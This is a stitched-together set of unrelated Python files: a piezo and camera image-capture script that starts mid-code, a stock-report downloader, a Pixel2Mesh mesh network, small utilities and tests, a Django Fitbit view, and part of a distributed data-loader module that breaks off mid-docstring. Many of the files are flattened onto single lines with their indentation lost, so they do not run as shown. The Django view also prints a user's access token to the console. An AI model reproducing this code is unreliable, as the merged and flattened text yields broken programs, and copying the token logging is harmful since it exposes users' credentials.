gaussian_filter(Ir, sigma=5) # #input('Capture background illuminance: Enter when ready...') #Ib = mlb.trigger_image_acquisition(cam_nodes) #Ib = gaussian_filter(Ib, sigma=5) if mode == 'c': subfolder = '\\images_calibration' elif mode == 'm': subfolder = '\\images_measurement' folder = os.path.dirname(os.path.realpath(__file__)) + subfolder + '\\stack' 
folder_srb = folder + '\\IsIrIb' if not os.path.exists(folder): os.makedirs(folder) if not os.path.exists(folder_srb): os.makedirs(folder_srb) #imageio.imsave(folder_srb + '\\Is.tiff', Is) #imageio.imsave(folder_srb + '\\Ir.tiff', Ir) #imageio.imsave(folder_srb + '\\Ib.tiff', Ib) input('Enter to continue...') ser = serial.Serial('COM4', 9600) # Establish the connection on a specific port sleep(4) max_steps = 4096 # minimum step: 1 mV, maximum step: 4096 mV steps = 600 increment = round(max_steps/steps) ser.write(encode_int2fixednumbytes(steps)) # Send number of steps to arduino ser.flush() ser.write(encode_int2fixednumbytes(increment)) # Send voltage increment to arduino ser.flush() # rounding of increment may lead to extra steps extra = (increment*steps - max_steps)//increment extra = extra if extra > 0 else 0 # arbitrarily omit a few of the first images, since PZT is oscillating # at the beginning omit = 5 rows = mlb.correct_type(cam_settings[0]) # Look at init_camera() --> keys cols = mlb.correct_type(cam_settings[1]) height = steps-extra-omit-1 image_stack = np.zeros([height, rows, cols]) #t1 = np.zeros(steps-extra) #t2 = np.zeros(steps-extra) #t3 = np.zeros(steps-extra) #t4 = np.zeros(steps-extra) #t5 = np.zeros(steps-extra) ts = time() mlb.begin_acquisition(cam) for i in range(steps-extra): # ts1 = time() rvalue = ser.readline().split(b'\r')[0] # t1[i] = time() - ts1 # ts2 = time() print(rvalue) # t2[i] = time() - ts2 # ts3 = time() if i+1 > omit: image_stack[i-omit-1] = mlb.grab_next_image_by_trigger(cam) # image_stack[i] = mlb.trigger_image_acquisition(cam_nodes) # t3[i] = time() - ts3 # ts4 = time() ser.write(b'ok\n') # t4[i] = time() - ts4 # ts5 = time() ser.flush() # t5[i] = time() - ts5 t = time() - ts del cam mlb.end_acquisition(cam_nodes) ser.close() # SAVE IMAGES TO DISK for j in range(height): fn = '\\' + str(j) + '.tiff' imageio.imsave(folder + fn, image_stack[j])
# -*- coding: utf-8 -*- import urllib3 import pandas as pd import os # if DOWNLOAD = False,don't download report DOWNLOAD=True def download_report(code): """ 下载报表(利润表年表,如果下载其他报表,需要修改url Arguments: code: 股票代码 """ # 利润表(年表) url = f"http://quotes.money.163.com/service/lrb_{code}.html?type=year" base_dir='data' if not os.path.exists(base_dir): os.makedirs(base_dir) report_file = f'{base_dir}/lrb_{code}.csv' http = urllib3.PoolManager() response = http.request('GET', url) with open(report_file, 'wb') as f: # 163网页的编码是gbk,需要转成utf-8 f.write(response.data.decode('gbk').encode('utf-8')) # 默认获取研发费用,修改row可以获取其他资料 def each_record(codes, years, row='研发费用(万元)'): for code in codes: filename = f'data/lrb_{code}.csv' df = pd.read_csv(filename, index_col=0) x = df.loc[row, years] yield [code] + list(x) if __name__ == '__main__': # 测试股票代码集合 codes = ['603730', '603757'] years = ['2018-12-31', '2017-12-31'] for code in codes: if DOWNLOAD == True: print(f"downloading report:{code}") download_report(code) summary = pd.DataFrame.from_records(each_record(codes, years), columns=['code'] + years) summary.to_csv('summary.csv', index=False)
# Copyright (C) 2019 Chao Wen, Yinda Zhang, Zhuwen Li, Yanwei Fu
# All rights reserved.
# This code is licensed under BSD 3-Clause License.
import tensorflow as tf
import tflearn
import os
import tensorflow.contrib.layers as tfcontriblayers
from modules.losses import mesh_loss, laplace_loss
from modules.layers import GraphConvolution, GraphPooling, GraphProjection


class Model(object):
    """Abstract base class for the mesh-generation networks.

    Holds the shared bookkeeping (name, layers, activations, loss and
    optimizer handles) plus checkpoint save/load helpers.  Subclasses
    implement the graph construction (`_build`/`build`) and loss (`_loss`).
    """

    def __init__(self, **kwargs):
        # Only these keyword arguments are accepted.
        allowed_kwargs = {'name', 'logging', 'suffix'}
        for kwarg in kwargs.keys():
            assert kwarg in allowed_kwargs, 'Invalid keyword argument: ' + kwarg
        # Default model name is the lower-cased class name.
        name = kwargs.get('name')
        if not name:
            name = self.__class__.__name__.lower()
        self.name = name
        logging = kwargs.get('logging', False)
        self.logging = logging
        save_dir_suffix = kwargs.get('suffix', '')
        self.save_dir_suffix = save_dir_suffix

        self.vars = {}          # model variables, keyed by variable name
        self.placeholders = {}  # feed placeholders
        self.layers = []        # layer objects, in execution order
        self.activations = []   # per-layer outputs, filled in build()

        self.inputs = None
        self.output1 = None    # coordinates produced by GCN block 1
        self.output2 = None    # coordinates produced by GCN block 2
        self.output3 = None    # coordinates produced by GCN block 3
        self.output1_2 = None  # output1 unpooled to block-2 resolution
        self.output2_2 = None  # output2 unpooled to block-3 resolution

        self.loss = 0
        self.inc_loss = 0
        self.pose_loss = 0

        self.optimizer = None
        self.optimizer_inc = None
        self.opt_op_vp = None
        self.opt_op_vi = None
        self.opt_op = None
        self.summary = None

    def _build(self):
        raise NotImplementedError

    def build(self):
        raise NotImplementedError

    def forward(self):
        raise NotImplementedError

    def predict(self):
        raise NotImplementedError

    def _loss(self):
        raise NotImplementedError

    def save(self, sess=None, ckpt_path=None, step=None):
        """Save all model variables to `ckpt_path`, tagging the file with `step`."""
        if not sess:
            raise AttributeError('TensorFlow session not provided.')
        saver = tf.train.Saver(self.vars, max_to_keep=0)
        save_path = saver.save(sess, os.path.join(ckpt_path, '{}.ckpt'.format(self.name)), global_step=step)
        print('Model saved in file: {}, epoch {}'.format(save_path, step))

    def load(self, sess=None, ckpt_path=None, step=None):
        """Restore model variables from the checkpoint written at `step`."""
        if not sess:
            raise AttributeError('TensorFlow session not provided.')
        # print(self.vars)
        saver = tf.train.Saver(self.vars)
        save_path = os.path.join(ckpt_path, '{}.ckpt-{}'.format(self.name, step))
        saver.restore(sess, save_path)
        print('Model restored from file: {}, epoch {}'.format(save_path, step))


class MeshNetMVP2M(Model):
    """Pixel2Mesh-style network: an 18-layer CNN image encoder feeding three
    cascaded graph-convolution blocks that progressively deform the input
    mesh features into 3-D coordinates (output1 -> output2 -> output3).
    """

    def __init__(self, placeholders, args, **kwargs):
        super(MeshNetMVP2M, self).__init__(**kwargs)
        self.inputs = placeholders['features']  # initial per-vertex features
        self.placeholders = placeholders
        self.args = args
        self.optimizer = tf.train.AdamOptimizer(learning_rate=self.args.lr)
        self.summary_loss = None
        self.merged_summary_op = None
        self.build()

    def _loss(self):
        """Accumulate mesh, Laplacian and weight-decay terms into self.loss."""
        # Pixel2mesh loss: one mesh + one Laplacian term per GCN block.
        self.loss += mesh_loss(self.output1, self.placeholders, 1)
        self.loss += mesh_loss(self.output2, self.placeholders, 2)
        self.loss += mesh_loss(self.output3, self.placeholders, 3)
        self.loss += laplace_loss(self.inputs, self.output1, self.placeholders, 1)
        self.loss += laplace_loss(self.output1_2, self.output2, self.placeholders, 2)
        self.loss += laplace_loss(self.output2_2, self.output3, self.placeholders, 3)

        # Weight decay loss over the graph-conv layers of the three blocks
        # (layer indices skip the projection/pooling layers at 0, 15-16, 31-32).
        conv_layers = list(range(1, 15)) + list(range(17, 31)) + list(range(33, 48))
        for layer_id in conv_layers:
            for var in self.layers[layer_id].vars.values():
                self.loss += 5e-6 * tf.nn.l2_loss(var)

    def _build(self):
        """Assemble the 48-layer sequence: 3 x (projection [+ pooling] + 14/15 GCNs)."""
        with tf.name_scope('pixel2mesh'):
            self.build_cnn18()  # update image feature
            # first project block
            self.layers.append(GraphProjection(placeholders=self.placeholders, name='graph_proj_1_layer_0'))
            self.layers.append(GraphConvolution(input_dim=self.args.feat_dim,
                                                output_dim=self.args.hidden_dim,
                                                gcn_block_id=1,
                                                placeholders=self.placeholders,
                                                name='graph_conv_blk1_1_layer_1',
                                                logging=self.logging))
            for _ in range(12):
                self.layers.append(GraphConvolution(input_dim=self.args.hidden_dim,
                                                    output_dim=self.args.hidden_dim,
                                                    gcn_block_id=1,
                                                    placeholders=self.placeholders,
                                                    name='graph_conv_blk1_{}_layer_{}'.format(2 + _, 2 + _),
                                                    logging=self.logging))
            # activation #15; layer #14; output 1 (identity activation -> raw coords)
            self.layers.append(GraphConvolution(input_dim=self.args.hidden_dim,
                                                output_dim=self.args.coord_dim,
                                                act=lambda x: x,
                                                gcn_block_id=1,
                                                placeholders=self.placeholders,
                                                name='graph_conv_blk1_14_layer_14',
                                                logging=self.logging))
            # second project block
            self.layers.append(GraphProjection(placeholders=self.placeholders, name='graph_proj_2_layer_15'))
            self.layers.append(GraphPooling(placeholders=self.placeholders, pool_id=1, name='graph_pool_1to2_layer_16'))
            self.layers.append(GraphConvolution(input_dim=self.args.feat_dim + self.args.hidden_dim,
                                                output_dim=self.args.hidden_dim,
                                                gcn_block_id=2,
                                                placeholders=self.placeholders,
                                                name='graph_conv_blk2_1_layer_17',
                                                logging=self.logging))
            for _ in range(12):
                self.layers.append(GraphConvolution(input_dim=self.args.hidden_dim,
                                                    output_dim=self.args.hidden_dim,
                                                    gcn_block_id=2,
                                                    placeholders=self.placeholders,
                                                    name='graph_conv_blk2_{}_layer_{}'.format(2 + _, 18 + _),
                                                    logging=self.logging))
            self.layers.append(GraphConvolution(input_dim=self.args.hidden_dim,
                                                output_dim=self.args.coord_dim,
                                                act=lambda x: x,
                                                gcn_block_id=2,
                                                placeholders=self.placeholders,
                                                name='graph_conv_blk2_14_layer_30',
                                                logging=self.logging))
            # third project block
            self.layers.append(GraphProjection(placeholders=self.placeholders, name='graph_proj_3_layer_31'))
            self.layers.append(GraphPooling(placeholders=self.placeholders, pool_id=2, name='graph_pool_2to3_layer_32'))
            self.layers.append(GraphConvolution(input_dim=self.args.feat_dim + self.args.hidden_dim,
                                                output_dim=self.args.hidden_dim,
                                                gcn_block_id=3,
                                                placeholders=self.placeholders,
                                                name='graph_conv_blk3_1_layer_33',
                                                logging=self.logging))
            for _ in range(13):
                self.layers.append(GraphConvolution(input_dim=self.args.hidden_dim,
                                                    output_dim=self.args.hidden_dim,
                                                    gcn_block_id=3,
                                                    placeholders=self.placeholders,
                                                    name='graph_conv_blk3_{}_layer_{}'.format(2 + _, 34 + _),
                                                    logging=self.logging))
            self.layers.append(GraphConvolution(input_dim=self.args.hidden_dim,
                                                output_dim=self.args.coord_dim,
                                                act=lambda x: x,
                                                gcn_block_id=3,
                                                placeholders=self.placeholders,
                                                name='graph_conv_blk3_15_layer_47',
                                                logging=self.logging))

    def build_cnn18(self):
        """18-conv VGG-like encoder.

        Stores the multi-scale feature maps (x2..x5) in
        placeholders['img_feat'] for the projection layers, and adds the
        collected L2 regularisation (scaled by 0.3) to self.loss.
        """
        x = self.placeholders['img_inp']
        # x = tf.expand_dims(x, 0)
        # 224 224
        x = tflearn.layers.conv.conv_2d(x, 16, (3, 3), strides=1, activation='relu',
                                        weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_1')
        x = tflearn.layers.conv.conv_2d(x, 16, (3, 3), strides=1, activation='relu',
                                        weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_2')
        x0 = x
        x = tflearn.layers.conv.conv_2d(x, 32, (3, 3), strides=2, activation='relu',
                                        weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_3')
        # 112 112
        x = tflearn.layers.conv.conv_2d(x, 32, (3, 3), strides=1, activation='relu',
                                        weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_4')
        x = tflearn.layers.conv.conv_2d(x, 32, (3, 3), strides=1, activation='relu',
                                        weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_5')
        x1 = x
        x = tflearn.layers.conv.conv_2d(x, 64, (3, 3), strides=2, activation='relu',
                                        weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_6')
        # 56 56
        x = tflearn.layers.conv.conv_2d(x, 64, (3, 3), strides=1, activation='relu',
                                        weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_7')
        x = tflearn.layers.conv.conv_2d(x, 64, (3, 3), strides=1, activation='relu',
                                        weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_8')
        x2 = x
        x = tflearn.layers.conv.conv_2d(x, 128, (3, 3), strides=2, activation='relu',
                                        weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_9')
        # 28 28
        x = tflearn.layers.conv.conv_2d(x, 128, (3, 3), strides=1, activation='relu',
                                        weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_10')
        x = tflearn.layers.conv.conv_2d(x, 128, (3, 3), strides=1, activation='relu',
                                        weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_11')
        x3 = x
        x = tflearn.layers.conv.conv_2d(x, 256, (5, 5), strides=2, activation='relu',
                                        weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_12')
        # 14 14
        x = tflearn.layers.conv.conv_2d(x, 256, (3, 3), strides=1, activation='relu',
                                        weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_13')
        x = tflearn.layers.conv.conv_2d(x, 256, (3, 3), strides=1, activation='relu',
                                        weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_14')
        x4 = x
        x = tflearn.layers.conv.conv_2d(x, 512, (5, 5), strides=2, activation='relu',
                                        weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_15')
        # 7 7
        x = tflearn.layers.conv.conv_2d(x, 512, (3, 3), strides=1, activation='relu',
                                        weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_16')
        x = tflearn.layers.conv.conv_2d(x, 512, (3, 3), strides=1, activation='relu',
                                        weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_17')
        x = tflearn.layers.conv.conv_2d(x, 512, (3, 3), strides=1, activation='relu',
                                        weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_18')
        x5 = x
        # update image feature
        self.placeholders.update({'img_feat': [tf.squeeze(x2), tf.squeeze(x3), tf.squeeze(x4), tf.squeeze(x5)]})
        self.loss += tf.add_n(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)) * 0.3

    def build(self):
        """Wrapper for _build(): runs the layer sequence with residual adds
        (eltwise indices) and skip concatenations (concat indices), then sets
        up the loss, the optimizer op and the loss summary.
        """
        with tf.variable_scope(self.name):
            self._build()

        # Build sequential resnet model
        eltwise = [3, 5, 7, 9, 11, 13, 19, 21, 23, 25, 27, 29, 35, 37, 39, 41, 43, 45]
        concat = [15, 31]
        # proj = [0, 15, 31]
        self.activations.append(self.inputs)
        for idx, layer in enumerate(self.layers[:48]):
            hidden = layer(self.activations[-1])
            if idx in eltwise:
                # Residual connection, averaged with the previous activation.
                hidden = tf.add(hidden, self.activations[-2]) * 0.5
            if idx in concat:
                # Skip connection: concatenate projected features with the
                # previous block's hidden state.
                hidden = tf.concat([hidden, self.activations[-2]], 1)
            self.activations.append(hidden)

        self.output1 = self.activations[15]
        unpool_layer = GraphPooling(placeholders=self.placeholders, pool_id=1)
        self.output1_2 = unpool_layer(self.output1)

        self.output2 = self.activations[31]
        unpool_layer = GraphPooling(placeholders=self.placeholders, pool_id=2)
        self.output2_2 = unpool_layer(self.output2)

        self.output3 = self.activations[48]

        # Store model variables for easy access
        variables = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.name + '/')
        self.vars = {var.name: var for var in variables}

        # Build metrics
        self._loss()
        self.opt_op = self.optimizer.minimize(self.loss)
        self.summary_loss = tf.summary.scalar('loss', self.loss)
        self.merged_summary_op = tf.summary.merge([self.summary_loss])
from tkinter import * def fill_list_scrollbar(items): top = Tk() top.geometry('1024x400') top.title('Relação de e-mails que foram enviados') sb = Scrollbar(top) sb.pack(side = RIGHT, fill = Y) mylist = Listbox(top, yscrollcommand = sb.set, width='1024', height='400') for line in items: mylist.insert(END, line) mylist.pack(side = LEFT) sb.config(command = mylist.yview)
def timed_func(f, args=(), kwargs=None, timeout=30, default=None, errormsg="Timeout error"): # Since kwargs are mutable, assume they don't exist via optional arguments. If they do in fact exist, # they will exist in this context and be assigned. Otherwise, set to an empty dict and proceed. kwargs = kwargs or {} import signal class TimeoutError(Exception): pass def timeout_handler(signum, frame): raise TimeoutError # Register a signal to our handler signal.signal(signal.SIGALRM, timeout_handler) # Trigger an alarm after timeout seconds signal.alarm(timeout) # Try a function call: # If it returns normally before the timeout, pass along the value # Otherwise, print the specific error and return the default value try: result = f(*args, **kwargs) except TimeoutError: result = default print(errormsg) finally: signal.alarm(0) return result # Silly function that never returns def forever(): import time while True: time.sleep(1) # Function that may or may not complete depending on the timeout def andever(a,b): result = a while True: result += b #if result > 200000000: if result > 100000000: return result # Test print(timed_func(forever, timeout=2, default="no response", errormsg="failed to update")) print(timed_func(andever, (1,2), timeout=5, default=-1, errormsg="computation timeout"))
import unittest from ratings.ratings import elo_rating class TestRatings(unittest.TestCase): def test_elo_rating(self): p1_rating = 1200 p2_rating = 1000 K = 32 ratings_if_p1_wins = elo_rating(p1_rating, p2_rating, K, True) expected_ratings_p1_wins = (1208, 992) self.assertEqual(ratings_if_p1_wins, expected_ratings_p1_wins) ratings_if_p2_wins = elo_rating(p1_rating, p2_rating, K, False) expected_ratings_p2_wins = (1176, 1024) self.assertEqual(ratings_if_p2_wins, expected_ratings_p2_wins) if __name__ == '__main__': unittest.main()
# # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import argparse import kserve from .driver_transformer import DriverTransformer import logging logging.basicConfig(level=kserve.constants.KSERVE_LOGLEVEL) DEFAULT_MODEL_NAME = "sklearn-driver-transformer" parser = argparse.ArgumentParser(parents=[kserve.kfserver.parser]) parser.add_argument( "--predictor_host", help="The URL for the model predict function", required=True ) parser.add_argument( "--model_name", default=DEFAULT_MODEL_NAME, help='The name that the model is served under.') parser.add_argument( "--feast_serving_url", type=str, help="The url of the Feast Serving Service.", required=True) parser.add_argument( "--entity_ids", type=str, nargs="+", help="A list of entity ids to use as keys in the feature store.", required=True) parser.add_argument( "--feature_refs", type=str, nargs="+", help="A list of features to retrieve from the feature store.", required=True) args, _ = parser.parse_known_args() if __name__ == "__main__": transformer = DriverTransformer( name=args.model_name, predictor_host=args.predictor_host, feast_serving_url=args.feast_serving_url, entity_ids=args.entity_ids, feature_refs=args.feature_refs) kfserver = kserve.KFServer() kfserver.start(models=[transformer])
from django.shortcuts import render from django.contrib.auth.models import User # Create your views here. def index(request): print(request.user) if request.user.is_authenticated: social = request.user.social_auth.get(provider='fitbit') token = social.extra_data['access_token'] print(token) return render(request, 'temp/index.html') # https://www.fitbit.com/oauth2/authorize?client_id=22D3H4&redirect_uri=http://localhost:8000/complete/fitbit/&state=dqOuEqrXhT7nxrTyxK0fpGvgOklUQDo2&response_type=code&scope=activity+heartrate+profile+sleep+weight+profile
from django.urls import path, re_path from django.contrib.sitemaps.views import sitemap from blog.sitemaps import BlogSitemap from blog.views import ( BlogDetailView, BlogIndexView, BlogPostsRssFeed, BlogPostsAtomFeed, ) urlpatterns = [ # blog urls path("", BlogIndexView.as_view(), name="blog"), re_path(r"^(?P<slug>[-\w]+)/$", BlogDetailView.as_view(), name="blog_detail"), # rss & atom feed path("feed/rss/", BlogPostsRssFeed(), name="blog_rss_feed"), path("feed/atom/", BlogPostsAtomFeed(), name="blog_atom_feed"), # sitemap re_path( r"^sitemap\.xml$", sitemap, {"sitemaps": {"blog": BlogSitemap()}}, name="blog_sitemap", ), ]
import unittest import numpy as np import rlcard from rlcard.agents import RandomAgent from .determism_util import is_deterministic class TestVecEnv(unittest.TestCase): def test_vec_env(self): env = rlcard.make('limit-holdem', config={'env_num': 4}) env.set_agents([RandomAgent(env.action_num) for _ in range(env.player_num)]) trajectories, payoffs = env.run(is_training=False) self.assertEqual(len(payoffs), 4) trajectories, payoffs = env.run(is_training=True) if __name__ == '__main__': unittest.main()
# -*- coding: utf-8 -*- def foo(): pass print foo()
# Copyright 2021 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from typing import Optional

import torch
from torch.utils.data import BatchSampler, DataLoader, IterableDataset

from packaging import version

from .state import AcceleratorState, DistributedType, is_tpu_available
from .utils import send_to_device, synchronize_rng_states


if is_tpu_available():
    import torch_xla.core.xla_model as xm


# kwargs of the DataLoader in min version 1.4.0.
_PYTORCH_DATALOADER_KWARGS = {
    "batch_size": 1,
    "shuffle": False,
    "sampler": None,
    "batch_sampler": None,
    "num_workers": 0,
    "collate_fn": None,
    "pin_memory": False,
    "drop_last": False,
    "timeout": 0,
    "worker_init_fn": None,
    "multiprocessing_context": None,
}

# kwargs added after by version
_PYTORCH_DATALOADER_ADDITIONAL_KWARGS = {
    "1.6.0": {"generator": None},
    "1.7.0": {"prefetch_factor": 2, "persistent_workers": False},
}

# Merge in the kwargs supported by the installed torch version.
for v, additional_kwargs in _PYTORCH_DATALOADER_ADDITIONAL_KWARGS.items():
    if version.parse(torch.__version__) >= version.parse(v):
        _PYTORCH_DATALOADER_KWARGS.update(additional_kwargs)


class BatchSamplerShard(BatchSampler):
    """
    Wraps a PyTorch :obj:`BatchSampler` to generate batches for one of the processes only. Instances of this class
    will always yield a number of batches that is a round multiple of :obj:`num_processes` and that all have the same
    size. Depending on the value of the :obj:`drop_last` attribute of the batch sampler passed, it will either stop
    the iteration at the first batch that would be too small / not present on all processes or loop with indices from
    the beginning.

    Args:
        batch_sampler (:obj:`torch.utils.data.sampler.BatchSampler`):
            The batch sampler to split in several shards.
        num_processes (:obj:`int`, `optional`, defaults to 1):
            The number of processes running concurrently.
        process_index (:obj:`int`, `optional`, defaults to 0):
            The index of the current process.
        split_batches (:obj:`bool`, `optional`, defaults to :obj:`False`):
            Whether the shards should be created by splitting a batch to give a piece of it on each process, or by
            yielding different full batches on each process.

            On two processes with a sampler of :obj:`[[0, 1, 2, 3], [4, 5, 6, 7]]`, this will result in:

            - the sampler on process 0 to yield :obj:`[0, 1, 2, 3]` and the sampler on process 1 to yield
              :obj:`[4, 5, 6, 7]` if this argument is set to :obj:`False`.
            - the sampler on process 0 to yield :obj:`[0, 1]` then :obj:`[4, 5]` and the sampler on process 1 to yield
              :obj:`[2, 3]` then :obj:`[6, 7]` if this argument is set to :obj:`True`.

    .. warning::

        This does not support :obj:`BatchSampler` with varying batch size yet.
    """

    def __init__(
        self,
        batch_sampler: BatchSampler,
        num_processes: int = 1,
        process_index: int = 0,
        split_batches: bool = False,
    ):
        if split_batches and batch_sampler.batch_size % num_processes != 0:
            raise ValueError(
                f"To use `BatchSamplerShard` in `split_batches` mode, the batch size ({batch_sampler.batch_size}) "
                f"needs to be a round multiple of the number of processes ({num_processes})."
            )
        self.batch_sampler = batch_sampler
        self.num_processes = num_processes
        self.process_index = process_index
        self.split_batches = split_batches
        self.batch_size = batch_sampler.batch_size
        self.drop_last = batch_sampler.drop_last

    def __len__(self):
        # Each process sees 1/num_processes of the batches; without drop_last
        # a final (looped-around) batch may be added.
        if len(self.batch_sampler) % self.num_processes == 0:
            return len(self.batch_sampler) // self.num_processes
        length = len(self.batch_sampler) // self.num_processes
        return length if self.drop_last else length + 1

    def __iter__(self):
        return self._iter_with_split() if self.split_batches else self._iter_with_no_split()

    def _iter_with_split(self):
        # Each full batch is sliced and this process yields its own piece.
        initial_data = []
        batch_length = self.batch_sampler.batch_size // self.num_processes
        for idx, batch in enumerate(self.batch_sampler):
            if idx == 0:
                initial_data = batch
            if len(batch) == self.batch_size:
                # If the batch is full, we yield the part of it this process is responsible of.
                yield batch[batch_length * self.process_index : batch_length * (self.process_index + 1)]

        # If drop_last is True or the last batch was full, iteration is over, otherwise...
        if not self.drop_last and len(initial_data) > 0 and len(batch) < self.batch_size:
            # For degenerate cases where the dataset has less than num_process * batch_size samples
            while len(initial_data) < self.batch_size:
                initial_data += initial_data
            batch = batch + initial_data
            yield batch[batch_length * self.process_index : batch_length * (self.process_index + 1)]

    def _iter_with_no_split(self):
        # Batches are dealt out round-robin; this process keeps every
        # num_processes-th batch.
        initial_data = []
        batch_to_yield = []
        for idx, batch in enumerate(self.batch_sampler):
            # We gather the initial indices in case we need to circle back at the end.
            if not self.drop_last and idx < self.num_processes:
                initial_data += batch
            # We identify the batch to yield but wait until we are sure every process gets a full batch before actually
            # yielding it.
            if idx % self.num_processes == self.process_index:
                batch_to_yield = batch
            if idx % self.num_processes == self.num_processes - 1 and len(batch) == self.batch_size:
                yield batch_to_yield
                batch_to_yield = []

        # If drop_last is True, iteration is over, otherwise...
        if not self.drop_last and len(initial_data) > 0:
            # ... we yield the complete batch we had saved before if it has the proper length
            if len(batch_to_yield) == self.batch_size:
                yield batch_to_yield

            # For degenerate cases where the dataset has less than num_process * batch_size samples
            while len(initial_data) < self.num_processes * self.batch_size:
                initial_data += initial_data

            # If the last batch seen was of the proper size, it has been yielded by its process so we move to the next
            if len(batch) == self.batch_size:
                batch = []
                idx += 1

            # Make sure we yield a multiple of self.num_processes batches
            cycle_index = 0
            while idx % self.num_processes != 0 or len(batch) > 0:
                end_index = cycle_index + self.batch_size - len(batch)
                batch += initial_data[cycle_index:end_index]
                if idx % self.num_processes == self.process_index:
                    yield batch
                cycle_index = end_index
                batch = []
                idx += 1


class IterableDatasetShard(IterableDataset):
    """
    Wraps a PyTorch :obj:`IterableDataset` to generate samples for one of the processes only. Instances of this class
    will always yield a number of samples that is a round multiple of the actual batch size (depending of the value of
    :obj:`split_batches`, this is either :obj:`batch_size` or :obj:`batch_size x num_processes`). Depending on the
    value of the :obj:`drop_last` attribute of the batch sampler passed, it will either stop the iteration at the
    first batch that would be too small or loop with indices from the beginning.

    Args:
        dataset (:obj:`torch.utils.data.dataset.IterableDataset`):
            The batch sampler to split in several shards.
        batch_size (:obj:`int`, `optional`, defaults to 1):
            The size of the batches per shard (if :obj:`split_batches=False`) or the size of the batches (if
            :obj:`split_batches=True`).
        drop_last (:obj:`bool`, `optional`, defaults to :obj:`False`):
            Whether or not to drop the last incomplete batch or complete the last batches by using the samples from
            the beginning.
        num_processes (:obj:`int`, `optional`, defaults to 1):
            The number of processes running concurrently.
        process_index (:obj:`int`, `optional`, defaults to 0):
            The index of the current process.
        split_batches (:obj:`bool`, `optional`, defaults to :obj:`False`):
            Whether the shards should be created by splitting a batch to give a piece of it on each process, or by
            yielding different full batches on each process.

            On two processes with an iterable dataset yielding of :obj:`[0, 1, 2, 3, 4, 5, 6, 7]`, this will result in:

            - the shard on process 0 to yield :obj:`[0, 1, 2, 3]` and the shard on process 1 to yield
              :obj:`[4, 5, 6, 7]` if this argument is set to :obj:`False`.
            - the shard on process 0 to yield :obj:`[0, 1, 4, 5]` and the sampler on process 1 to yield
              :obj:`[2, 3, 6, 7]` if this argument is set to :obj:`True`.
    """

    def __init__(
        self,
        dataset: IterableDataset,
        batch_size: int = 1,
        drop_last: bool = False,
        num_processes: int = 1,
        process_index: int = 0,
        split_batches: bool = False,
    ):
        if split_batches and batch_size % num_processes != 0:
            raise ValueError(
                f"To use `IterableDatasetShard` in `split_batches` mode, the batch size ({batch_size}) "
                f"needs to be a round multiple of the number of processes ({num_processes})."
            )
        self.dataset = dataset
        self.batch_size = batch_size
        self.drop_last = drop_last
        self.num_processes = num_processes
        self.process_index = process_index
        self.split_batches = split_batches

    def __iter__(self):
        # Accumulate `real_batch_size` samples, then yield the slice of each
        # accumulated batch that belongs to this process.
        real_batch_size = self.batch_size if self.split_batches else (self.batch_size * self.num_processes)
        process_batch_size = (self.batch_size // self.num_processes) if self.split_batches else self.batch_size
        process_slice = range(self.process_index * process_batch_size, (self.process_index + 1) * process_batch_size)

        first_batch = None
        current_batch = []
        for element in self.dataset:
            current_batch.append(element)
            # Wait to have a full batch before yielding elements.
            if len(current_batch) == real_batch_size:
                for i in process_slice:
                    yield current_batch[i]
                if first_batch is None:
                    first_batch = current_batch.copy()
                current_batch = []

        # Finished if drop_last is True, otherwise complete the last batch with elements from the beginning.
        if not self.drop_last and len(current_batch) > 0:
            if first_batch is None:
                first_batch = current_batch.copy()
            while len(current_batch) < real_batch_size:
                current_batch += first_batch
            for i in process_slice:
                yield current_batch[i]


class DataLoaderShard(DataLoader):
    """
    Subclass of a PyTorch :obj:`DataLoader` that will deal with device placement and current distributed setup.

    Args:
        dataset (:obj:`torch.utils.data.dataset.Dataset`):
            The dataset to use to build this dataloader.
        device (:obj:`torch.device`, `optional`):
            If passed, the device to put all batches on.
        kwargs:
            All other keyword arguments to pass to the regular :obj:`DataLoader` initialization.
    """

    def __init__(self, dataset, device=None, **kwargs):
        super().__init__(dataset, **kwargs)
        self.device = device

    def __iter__(self):
        # Keep RNG state identical across processes so shuffling agrees.
        synchronize_rng_states()
        state = AcceleratorState()
        for batch in super().__iter__():
            if state.distributed_type == DistributedType.TPU:
                # Required on TPU to materialise the lazy XLA graph per step.
                xm.mark_step()
            yield batch if self.device is None else send_to_device(batch, self.device)


def prepare_data_loader(
    dataloader: DataLoader,
    device: Optional[torch.device] = None,
    num_processes: Optional[int] = None,
    process_index: Optional[int] = None,
    split_batches: bool = False,
    put_on_device: bool = False,
) -> DataLoader:
    """
    Wraps a PyTorch :obj:`DataLoader` to generate batches for one of the processes only.

    Depending on the value of the :obj:`drop_last` attribute of the :obj:`dataloader` passed, it will either stop the
